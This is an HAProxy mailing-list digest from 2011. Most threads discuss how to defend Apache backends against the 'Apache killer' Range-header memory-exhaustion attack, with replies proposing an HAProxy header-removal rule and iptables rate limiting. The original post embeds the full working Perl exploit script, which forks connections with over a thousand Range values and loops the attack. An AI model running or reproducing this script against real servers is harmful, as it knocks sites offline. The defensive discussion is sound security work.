Re: Website crawling while connecting via haproxy balanced url

2011-08-22 Thread Willy Tarreau
Hi Amol,

On Mon, Aug 22, 2011 at 09:01:31AM -0700, Amol wrote:
> Hi,
> One of my tester complained this morning that he can access the servers fine 
> when he hits them individually and with decent response time, but when he 
> access via the haproxy load balanced url, the website is crawling for him. 
> The other interesting thing is people at other locations have no issues at 
> all.
> 
> So can you please tell me how can i debug this very specific issue with this 
> connection,
> 
> what we have tried so far is
> 
> restart is mac
> restart his home router
> reset safari
> reset firefox
> 
> But the issue still persists?

Well, at least the haproxy configuration would help, and ideally you
should take tcpdump traces on the haproxy machine for this IP address.
That way you'd be able to :
  1) say whether or not what he sees is normal
  2) determine if the issue is client-side or haproxy-side
  3) find a workaround or a fix
  4) sometimes discover a bug somewhere :-)

Regards,
Willy




Re: Defending against the "Apache killer"

2011-08-22 Thread Willy Tarreau
On Mon, Aug 22, 2011 at 07:57:10PM +0200, Baptiste wrote:
> Hi,
> 
> Why not only dropping this "Range:bytes=0-" header?

Agreed. Protecting against this vulnerability is not a matter of limiting
connections or whatever. The attack makes mod_deflate exhaust the process'
memory. What is needed is to remove the Range header when there are too
many occurrences of it.

Their attack puts up to 1300 Range values. Let's remove the header if
there are more than 2 :

reqidel ^Range if { hdr_cnt(Range) gt 2 }

That should reliably defeat the attack.

Regards,
Willy




Re: Defending against the "Apache killer"

2011-08-22 Thread Willy Tarreau
On Mon, Aug 22, 2011 at 06:26:01PM +, Svancara, Randall wrote:
> This is nothing new as brute force DOS attacks have been around for a while.  
> I am not sure this is an HA-Proxy feature or more of a MOD_SECURITY/iptables 
> feature.  Simple iptables rate limiting would be sufficient in thwarting this 
> attack.  For example,
> 
> I am using this for SSH now, but very applicable to a web server, change the 
> ports and hitcount to a number that is more appropriate for a webserver, like 
> 40 in 10 seconds.  
> 
> # Drop those nasty brute force SSH attempts and log them
> $IPTABLES -A INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m recent 
> --set
> $IPTABLES -A  INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m 
> recent  --update --seconds 60 --hitcount 4 -j SSHBRUTEDROP
> 
> I am using the above code to block ssh brute force attempts.

Doing so is already possible with haproxy but this has nothing to do with
the attack, as it's not a matter of request rate but memory exhaustion on
the server due to a vulnerability.

Regards,
Willy




Frontend instant 200 response

2011-08-22 Thread Guy Knights
Hi,

We have some HTTP calls from our app that we'd like to fire and forget, but
we need the Haproxy frontend send a response to the requester immediately
after it passes the request to the backend queue. The intention is to
replace our Gearman setup and thus save us some time in maintenance and
management as we can then just deal in HTTP calls, it also saves us having
to write PHP scripts for gearman processing. What we need is to just be able
to execute a curl call and send a response back as as soon as possible so
the curl call can complete and the script can finish processing.

The chain we want is:

1. Local webserver --- request ---> Haproxy frontend
2. Local webserver <--- local OK response --- Haproxy frontend --- request
(queue) ---> Haproxy backend
3. Haproxy backend --- request ---> Remote webserver
4. Haproxy backend <--- remote response --- Remote webserver
5. dumped <--- remote response --- Haproxy backend

I hope that makes sense. Can anyone provide any feedback on whether
something like this would be possible?

Thanks,
Guy

-- 
Guy Knights
Systems Administrator
Eastside Games
www.eastsidegamestudio.com
g...@eastsidegamestudio.com


RE: Defending against the "Apache killer"

2011-08-22 Thread Svancara, Randall
This is nothing new as brute force DOS attacks have been around for a while.  I 
am not sure this is an HA-Proxy feature or more of a MOD_SECURITY/iptables 
feature.  Simple iptables rate limiting would be sufficient in thwarting this 
attack.  For example,

I am using this for SSH now, but very applicable to a web server, change the 
ports and hitcount to a number that is more appropriate for a webserver, like 
40 in 10 seconds.  

# Drop those nasty brute force SSH attempts and log them
$IPTABLES -A INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m recent 
--set
$IPTABLES -A  INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m recent  
--update --seconds 60 --hitcount 4 -j SSHBRUTEDROP

I am using the above code to block ssh brute force attempts.

--Randall

-Original Message-
From: Levente Peres [mailto:sheri...@eurosystems.hu] 
Sent: Monday, August 22, 2011 9:54 AM
To: haproxy@formilux.org
Subject: Defending against the "Apache killer"

Hello,

There're a number of webserver-mace apps on the net, the newest that I heard of 
being the so called "Apache killer" script I saw a few days agon on Full 
disclosure... Here you can see a demonstration of what it does. Also, I've 
attached the script itself.


http://www.youtube.com/watch?v=fkCQZaVjBhA

I believe we should discuss some possibilities about how to configure HAProxy 
to protect Apache backends as much as possible, or at least mitigate such 
attacks? Any ideas?

Cheers,

Levente



Re: Defending against the "Apache killer"

2011-08-22 Thread Kai

Hi,

1. install nginx as frontend
2. install latest version of Apache as backend (afair 2.2.18 was not 
vulnerable to such DoS already, and 2.2.19 should be ok too)

3. remove apache's mod_deflate
4. done


--
Cheers,

Kai



Re: Defending against the "Apache killer"

2011-08-22 Thread Baptiste
Hi,

Why not only dropping this "Range:bytes=0-" header?

cheers


2011/8/22 Levente Peres :
> Hello,
>
> There're a number of webserver-mace apps on the net, the newest that I heard
> of being the so called "Apache killer" script I saw a few days agon on Full
> disclosure... Here you can see a demonstration of what it does. Also, I've
> attached the script itself.
>
> http://www.youtube.com/watch?v=fkCQZaVjBhA
>
> I believe we should discuss some possibilities about how to configure
> HAProxy to protect Apache backends as much as possible, or at least mitigate
> such attacks? Any ideas?
>
> Cheers,
>
> Levente
>



Defending against the "Apache killer"

2011-08-22 Thread Levente Peres

Hello,

There're a number of webserver-mace apps on the net, the newest that I 
heard of being the so called "Apache killer" script I saw a few days 
agon on Full disclosure... Here you can see a demonstration of what it 
does. Also, I've attached the script itself.


http://www.youtube.com/watch?v=fkCQZaVjBhA

I believe we should discuss some possibilities about how to configure 
HAProxy to protect Apache backends as much as possible, or at least 
mitigate such attacks? Any ideas?


Cheers,

Levente
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl  [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;  

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
 PeerPort => "80",
 Proto=> 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: 
gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
 PeerPort => "80",
 Proto=> 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: 
gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;   
} else {
return 0;   
}
}

if ($#ARGV < 0) {
usage;
exit;   
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;   
}
while(1) {
killapache();
}

Website crawling while connecting via haproxy balanced url

2011-08-22 Thread Amol
Hi,
One of my tester complained this morning that he can access the servers fine 
when he hits them individually and with decent response time, but when he 
access via the haproxy load balanced url, the website is crawling for him. 
The other interesting thing is people at other locations have no issues at all.

So can you please tell me how can i debug this very specific issue with this 
connection,

what we have tried so far is

restart is mac
restart his home router
reset safari
reset firefox

But the issue still persists?


Please help me